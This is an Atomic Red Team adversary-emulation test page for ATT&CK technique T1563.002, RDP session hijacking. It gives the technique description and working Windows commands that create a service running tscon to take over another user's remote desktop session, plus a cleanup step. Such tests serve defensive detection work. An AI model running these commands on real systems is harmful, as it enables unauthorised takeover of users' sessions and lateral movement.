T1563.002
Remote Service Session Hijacking: RDP Hijacking
Description from ATT&CK
Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, 1
c:\windows\system32\tscon.exe [session number to be stolen]
Atomic Tests
Atomic Test #1 - RDP hijacking
RDP hijacking - how to hijack RDS and RemoteApp sessions transparently to move through an organization
Supported Platforms: windows
auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| Session_ID | The ID of the session to which you want to connect | string | 1337 |
| Destination_ID | Connect the session of another user to a different session | string | rdp-tcp#55 |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
4
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack
Cleanup Commands:
1
2
sc.exe delete sesshijack >nul 2>&1